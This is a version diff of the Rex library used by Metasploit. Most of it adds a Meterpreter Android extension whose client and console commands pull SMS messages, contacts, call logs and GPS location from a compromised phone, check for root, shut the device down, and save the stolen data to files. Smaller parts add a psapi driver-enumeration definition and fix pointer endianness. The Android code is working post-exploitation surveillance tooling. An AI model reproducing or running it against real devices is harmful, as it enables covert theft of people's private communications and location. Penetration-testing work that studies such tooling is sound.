librex 0.0.70 → 0.0.71

data/lib/rex/parser/outpost24_nokogiri.rb

@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require "rex/parser/nokogiri_doc_mixin"
 
 module Rex

data/lib/rex/poly/machine.rb

@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 

data/lib/rex/poly/machine/machine.rb

@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 

data/lib/rex/poly/machine/x86.rb

@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 

data/lib/rex/post/meterpreter/extensions/android/android.rb

@@ -0,0 +1,128 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+require 'rex/post/meterpreter/extensions/android/tlv'
+require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter/client'
+require 'rex/post/meterpreter/channels/pools/stream_pool'
+
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+  
+class Android < Extension
+
+  def initialize(client)
+    super(client, 'android')
+
+    # Alias the following things on the client object so that they
+    # can be directly referenced
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'android',
+          'ext'  => self
+        },
+      ])
+  end
+  
+  def device_shutdown(n)
+    request = Packet.create_request('device_shutdown')
+    request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
+    response = client.send_request(request)
+    return response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
+  end 
+  
+  def dump_sms
+    sms = Array.new
+    request = Packet.create_request('dump_sms')
+    response = client.send_request(request)
+
+    response.each( TLV_TYPE_SMS_GROUP ) { |p|
+
+      sms <<
+      {
+        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
+        'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
+        'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
+        'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
+        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
+      }
+
+    }
+    return sms
+  end
+
+  def dump_contacts
+    contacts = Array.new
+    request = Packet.create_request('dump_contacts')
+    response = client.send_request(request)
+
+    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
+
+      contacts <<
+      {
+        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
+        'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
+        'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
+      }
+
+    }
+    return contacts
+  end
+
+  def geolocate
+
+    loc = Array.new
+    request = Packet.create_request('geolocate')
+    response = client.send_request(request)
+
+    loc <<
+    {
+      'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
+      'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
+    }
+
+    return loc
+  end
+
+  def dump_calllog
+    log = Array.new
+    request = Packet.create_request('dump_calllog')
+    response = client.send_request(request)
+
+    response.each(TLV_TYPE_CALLLOG_GROUP) { |p|
+
+      log <<
+      {
+        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
+        'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
+        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
+        'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
+        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
+      }
+
+    }
+    return log
+  end
+
+  def check_root
+    request = Packet.create_request('check_root')
+    response = client.send_request(request)
+    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
+  end
+end
+
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/extensions/android/tlv.rb

@@ -0,0 +1,40 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+TLV_TYPE_SMS_ADDRESS      = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
+TLV_TYPE_SMS_BODY         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
+TLV_TYPE_SMS_TYPE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
+TLV_TYPE_SMS_GROUP        = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9004)
+TLV_TYPE_SMS_STATUS       = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9005)
+TLV_TYPE_SMS_DATE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9006)
+
+TLV_TYPE_CONTACT_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9007)
+TLV_TYPE_CONTACT_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9008)
+TLV_TYPE_CONTACT_EMAIL    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9009)
+TLV_TYPE_CONTACT_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9010)
+
+TLV_TYPE_GEO_LAT          = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9011)
+TLV_TYPE_GEO_LONG         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9012)
+
+TLV_TYPE_CALLLOG_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9013)
+TLV_TYPE_CALLLOG_TYPE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9014)
+TLV_TYPE_CALLLOG_DATE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9015)
+TLV_TYPE_CALLLOG_DURATION = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9016)
+TLV_TYPE_CALLLOG_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9017)
+TLV_TYPE_CALLLOG_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9018)
+
+TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
+
+TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
+
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb

@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Railgun
+module Def
+
+class Def_psapi
+
+  def self.create_dll(dll_path = 'psapi')
+    dll = DLL.new(dll_path, ApiConstants.manager)
+
+    dll.add_function('EnumDeviceDrivers', 'BOOL',[
+      %w(PBLOB lpImageBase out),
+      %w(DWORD cb in),
+      %w(PDWORD lpcbNeeded out)
+    ])
+
+    dll.add_function('GetDeviceDriverBaseNameA', 'DWORD', [
+      %w(LPVOID ImageBase in),
+      %w(PBLOB lpBaseName out),
+      %w(DWORD nSize in)
+    ])
+
+    return dll
+  end
+
+end
+
+end; end; end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb

@@ -120,7 +120,7 @@ class DLL
     raise "#{function.params.length} arguments expected. #{args.length} arguments provided." unless args.length == function.params.length
 
     if( client.platform =~ /x64/i )
-      native = 'Q'
+      native = 'Q<'
     else
       native = 'V'
     end
@@ -153,12 +153,12 @@ class DLL
         buffer_size = args[param_idx]
         if param_desc[0] == "PDWORD"
           # bump up the size for an x64 pointer
-          if( native == 'Q' and buffer_size == 4 )
+          if( native == 'Q<' and buffer_size == 4 )
             args[param_idx] = 8
             buffer_size = args[param_idx]
           end
 
-          if( native == 'Q' )
+          if( native == 'Q<' )
             raise "Please pass 8 for 'out' PDWORDS, since they require a buffer of size 8" unless buffer_size == 8
           elsif( native == 'V' )
             raise "Please pass 4 for 'out' PDWORDS, since they require a buffer of size 4" unless buffer_size == 4
@@ -288,7 +288,7 @@ class DLL
     #process return value
     case function.return_type
       when "LPVOID", "HANDLE"
-        if( native == 'Q' )
+        if( native == 'Q<' )
           return_hash["return"] = rec_return_value
         else
           return_hash["return"] = rec_return_value % 4294967296
@@ -318,7 +318,7 @@ class DLL
       buffer = rec_out_only_buffers[buffer_item.addr, buffer_item.length_in_bytes]
       case buffer_item.datatype
         when "PDWORD"
-          return_hash[param_name] = buffer.unpack('V')[0]
+          return_hash[param_name] = buffer.unpack(native)[0]
         when "PCHAR"
           return_hash[param_name] = asciiz_to_str(buffer)
         when "PWCHAR"
@@ -338,7 +338,7 @@ class DLL
       buffer = rec_inout_buffers[buffer_item.addr, buffer_item.length_in_bytes]
       case buffer_item.datatype
         when "PDWORD"
-          return_hash[param_name] = buffer.unpack('V')[0]
+          return_hash[param_name] = buffer.unpack(native)[0]
         when "PCHAR"
           return_hash[param_name] = asciiz_to_str(buffer)
         when "PWCHAR"

data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb

@@ -50,7 +50,7 @@ class MultiCaller
       @win_consts = win_consts
 
       if( @client.platform =~ /x64/i )
-        @native = 'Q'
+        @native = 'Q<'
       else
         @native = 'V'
       end
@@ -102,12 +102,12 @@ class MultiCaller
             raise "error in param #{param_desc[1]}: Out-only buffers must be described by a number indicating their size in bytes " unless args[param_idx].class == Fixnum
             buffer_size = args[param_idx]
             # bump up the size for an x64 pointer
-            if( @native == 'Q' and buffer_size == 4 )
+            if( @native == 'Q<' and buffer_size == 4 )
               args[param_idx] = 8
               buffer_size = args[param_idx]
             end
 
-            if( @native == 'Q' )
+            if( @native == 'Q<' )
               raise "Please pass 8 for 'out' PDWORDS, since they require a buffer of size 8" unless buffer_size == 8
             elsif( @native == 'V' )
               raise "Please pass 4 for 'out' PDWORDS, since they require a buffer of size 4" unless buffer_size == 4
@@ -242,7 +242,7 @@ class MultiCaller
         #process return value
         case function.return_type
           when "LPVOID", "HANDLE"
-            if( @native == 'Q' )
+            if( @native == 'Q<' )
               return_hash["return"] = rec_return_value
             else
               return_hash["return"] = rec_return_value % 4294967296

data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb

@@ -78,7 +78,8 @@ class Railgun
     'crypt32',
     'wlanapi',
     'wldap32',
-    'version'
+    'version',
+    'psapi'
   ].freeze
 
   ##

data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb

@@ -27,8 +27,8 @@ module PointerUtil
 
     case platform
     when PlatformUtil::X86_64
-      # XXX: Only works if attacker and victim are like-endianed
-      [pointer].pack('Q')
+      # Assume little endian
+      [pointer].pack('Q<')
     when PlatformUtil::X86_32
       [pointer].pack('V')
     else
@@ -40,8 +40,8 @@ module PointerUtil
   def self.unpack_pointer(packed_pointer, platform)
     case platform
     when PlatformUtil::X86_64
-      # XXX: Only works if attacker and victim are like-endianed
-      packed_pointer.unpack('Q').first
+      # Assume little endian
+      packed_pointer.unpack('Q<').first
     when PlatformUtil::X86_32
       packed_pointer.unpack('V').first
     else

data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb

@@ -324,8 +324,8 @@ class  Util
   #
   def unpack_pointer(packed_pointer)
     if is_64bit
-      # XXX: Only works if attacker and victim are like-endianed
-      packed_pointer.unpack('Q')[0]
+      # Assume little endian
+      packed_pointer.unpack('Q<')[0]
     else
       packed_pointer.unpack('V')[0]
     end
@@ -452,9 +452,9 @@ class  Util
       # Both on x86 and x64, DWORD is 32 bits
       return raw.unpack('V').first
     when :BOOL
-      return raw.unpack('l').first == 1
+      return raw.unpack('V').first == 1
     when :LONG
-      return raw.unpack('l').first
+      return raw.unpack('V').first
     end
 
     #If nothing worked thus far, return it raw

data/lib/rex/post/meterpreter/packet.rb

@@ -251,7 +251,7 @@ class Tlv
     elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
       raw = [value].pack("N")
     elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
-      raw = [ self.htonq( value.to_i ) ].pack("Q")
+      raw = [ self.htonq( value.to_i ) ].pack("Q<")
     elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
       if (value == true)
         raw = [1].pack("c")
@@ -312,7 +312,7 @@ class Tlv
     elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
       self.value = raw.unpack("NNN")[2]
     elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
-      self.value = raw.unpack("NNQ")[2]
+      self.value = raw.unpack("NNQ<")[2]
       self.value = self.ntohq( self.value )
     elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
       self.value = raw.unpack("NNc")[2]
@@ -335,7 +335,7 @@ class Tlv
     if( [1].pack( 's' ) == [1].pack( 'n' ) )
       return value
     end
-    return [ value ].pack( 'Q' ).reverse.unpack( 'Q' ).first
+    return [ value ].pack( 'Q<' ).reverse.unpack( 'Q<' ).first
   end
 
   def ntohq( value )

data/lib/rex/post/meterpreter/ui/console.rb

@@ -106,6 +106,8 @@ class Console
       log_error("Operation timed out.")
     rescue RequestError => info
       log_error(info.to_s)
+    rescue Rex::AddressInUse => e
+      log_error(e.message)
     rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
       self.client.kill
     rescue  ::Exception => e

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb

@@ -0,0 +1,383 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+require 'msf/core/auxiliary/report'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+class Console::CommandDispatcher::Android
+  include Console::CommandDispatcher
+  include Msf::Auxiliary::Report
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      'dump_sms'          => 'Get sms messages',
+      'dump_contacts'     => 'Get contacts list',
+      'geolocate'         => 'Get current lat-long using geolocation',
+      'dump_calllog'      => 'Get call log',
+      'check_root'        => 'Check if device is rooted',
+      'device_shutdown'   => 'Shutdown device'
+    }
+
+    reqs = {
+      'dump_sms'        => [ 'dump_sms' ],
+      'dump_contacts'   => [ 'dump_contacts' ],
+      'geolocate'       => [ 'geolocate' ],
+      'dump_calllog'    => [ 'dump_calllog' ],
+      'check_root'      => [ 'check_root' ],
+      'device_shutdown' => [ 'device_shutdown']
+    }
+
+    # Ensure any requirements of the command are met
+    all.delete_if do |cmd, desc|
+      reqs[cmd].any? { |req| not client.commands.include?(req) }
+    end
+  end
+
+  def cmd_device_shutdown(*args)
+
+    seconds = 0
+    device_shutdown_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ],
+      '-t' => [ false, 'Shutdown after n seconds']
+    )
+
+    device_shutdown_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: device_shutdown [options]')
+        print_line('Shutdown device.')
+        print_line(device_shutdown_opts.usage)
+        return
+      when '-t'
+        seconds = val.to_i
+      end
+    }
+
+    res = client.android.device_shutdown(seconds)
+
+    if res
+      print_status("Device will shutdown #{seconds > 0 ?('after ' + seconds + ' seconds'):'now'}")
+    else
+      print_error('Device shutdown failed')
+    end
+  end
+  
+  def cmd_dump_sms(*args)
+
+    path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    dump_sms_opts = Rex::Parser::Arguments.new(
+        '-h' => [ false, 'Help Banner' ],
+        '-o' => [ false, 'Output path for sms list']
+    )
+
+    dump_sms_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: dump_sms [options]')
+        print_line('Get sms messages.')
+        print_line(dump_sms_opts.usage)
+        return
+      when '-o'
+        path = val
+      end
+    }
+
+    smsList = []
+    smsList = client.android.dump_sms
+
+    if smsList.count > 0
+      print_status("Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}")
+      begin
+        info = client.sys.config.sysinfo
+
+        data = ""
+        data << "\n=====================\n"
+        data << "[+] Sms messages dump\n"
+        data << "=====================\n\n"
+
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
+
+        smsList.each_with_index { |a, index|
+
+          data << "##{index.to_i + 1}\n"
+
+          type = 'Unknown'
+          if a['type'] == '1'
+            type = 'Incoming'
+          elsif a['type'] == '2'
+            type = 'Outgoing'
+          end
+
+          status = 'Unknown'
+          if a['status'] == '-1'
+            status = 'NOT_RECEIVED'
+          elsif a['status'] == '1'
+            status = 'SME_UNABLE_TO_CONFIRM'
+          elsif a['status'] == '0'
+            status = 'SUCCESS'
+          elsif a['status'] == '64'
+            status = 'MASK_PERMANENT_ERROR'
+          elsif a['status'] == '32'
+            status = 'MASK_TEMPORARY_ERROR'
+          elsif a['status'] == '2'
+            status = 'SMS_REPLACED_BY_SC'
+          end
+
+          data << "Type\t: #{type}\n"
+
+          time = a['date'].to_i / 1000
+          time = Time.at(time)
+
+          data << "Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n"
+          data << "Address\t: #{a['address']}\n"
+          data << "Status\t: #{status}\n"
+          data << "Message\t: #{a['body']}\n\n"
+        }
+
+        ::File.write(path, data)
+        print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
+
+        return true
+      rescue
+        print_error("Error getting messages: #{$!}")
+        return false
+      end
+    else
+      print_status('No sms messages were found!')
+      return false
+    end
+  end
+
+
+  def cmd_dump_contacts(*args)
+
+    path = "contacts_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    dump_contacts_opts = Rex::Parser::Arguments.new(
+
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for contacts list']
+
+    )
+
+    dump_contacts_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: dump_contacts [options]')
+        print_line('Get contacts list.')
+        print_line(dump_contacts_opts.usage)
+        return
+      when '-o'
+        path = val
+      end
+    }
+
+    contactList = []
+    contactList = client.android.dump_contacts
+
+    if contactList.count > 0
+      print_status("Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list")
+      begin
+        info = client.sys.config.sysinfo
+
+        data = ""
+        data << "\n======================\n"
+        data << "[+] Contacts list dump\n"
+        data << "======================\n\n"
+
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
+
+        contactList.each_with_index { |c, index|
+
+          data << "##{index.to_i + 1}\n"
+          data << "Name\t: #{c['name']}\n"
+
+          if c['number'].count > 0
+            (c['number']).each { |n|
+              data << "Number\t: #{n}\n"
+            }
+          end
+
+          if c['email'].count > 0
+            (c['email']).each { |n|
+              data << "Email\t: #{n}\n"
+            }
+          end
+
+          data << "\n"
+        }
+  
+        ::File.write(path, data)
+        print_status("Contacts list saved to: #{path}")
+
+        return true
+      rescue
+        print_error("Error getting contacts list: #{$!}")
+        return false
+      end
+    else
+      print_status('No contacts were found!')
+      return false
+    end
+  end
+
+  def cmd_geolocate(*args)
+
+    generate_map = false
+    geolocate_opts = Rex::Parser::Arguments.new(
+
+      '-h' => [ false, 'Help Banner' ],
+      '-g' => [ false, 'Generate map using google-maps']
+
+    )
+
+    geolocate_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: geolocate [options]')
+        print_line('Get current location using geolocation.')
+        print_line(geolocate_opts.usage)
+        return
+      when '-g'
+        generate_map = true
+      end
+    }
+
+    geo = client.android.geolocate
+
+    print_status('Current Location:')
+    print_line("\tLatitude:  #{geo[0]['lat']}")
+    print_line("\tLongitude: #{geo[0]['long']}\n")
+    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}&sensor=true\n")
+
+    if generate_map
+      link = "https://maps.google.com/maps?q=#{geo[0]['lat'].to_f},#{geo[0]['long'].to_f}"
+      print_status("Generated map on google-maps:")
+      print_status(link)
+      Rex::Compat.open_browser(link)
+    end
+
+  end
+
+  def cmd_dump_calllog(*args)
+
+    path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
+    dump_calllog_opts = Rex::Parser::Arguments.new(
+
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for call log']
+
+    )
+
+    dump_calllog_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: dump_calllog [options]')
+        print_line('Get call log.')
+        print_line(dump_calllog_opts.usage)
+        return
+      when '-o'
+        path = val
+      end
+    }
+
+    log = client.android.dump_calllog
+
+    if log.count > 0
+      print_status("Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}")
+      begin
+        info = client.sys.config.sysinfo
+
+        data = ""
+        data << "\n=================\n"
+        data << "[+] Call log dump\n"
+        data << "=================\n\n"
+
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
+
+        log.each_with_index { |a, index|
+
+          data << "##{index.to_i + 1}\n"
+
+          data << "Number\t: #{a['number']}\n"
+          data << "Name\t: #{a['name']}\n"
+          data << "Date\t: #{a['date']}\n"
+          data << "Type\t: #{a['type']}\n"
+          data << "Duration: #{a['duration']}\n\n"
+        }
+
+        ::File.write(path, data)
+        print_status("Call log saved to #{path}")
+
+        return true
+      rescue
+        print_error("Error getting call log: #{$!}")
+        return false
+      end
+    else
+      print_status('No call log entries were found!')
+      return false
+    end
+  end
+
+
+  def cmd_check_root(*args)
+
+    check_root_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ]
+    )
+
+    check_root_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: check_root [options]')
+        print_line('Check if device is rooted.')
+        print_line(check_root_opts.usage)
+        return
+      end
+    }
+
+    is_rooted = client.android.check_root
+
+    if is_rooted
+      print_good('Device is rooted')
+    elsif
+      print_status('Device is not rooted')
+    end
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    'Android'
+  end
+
+end
+
+end
+end
+end
+end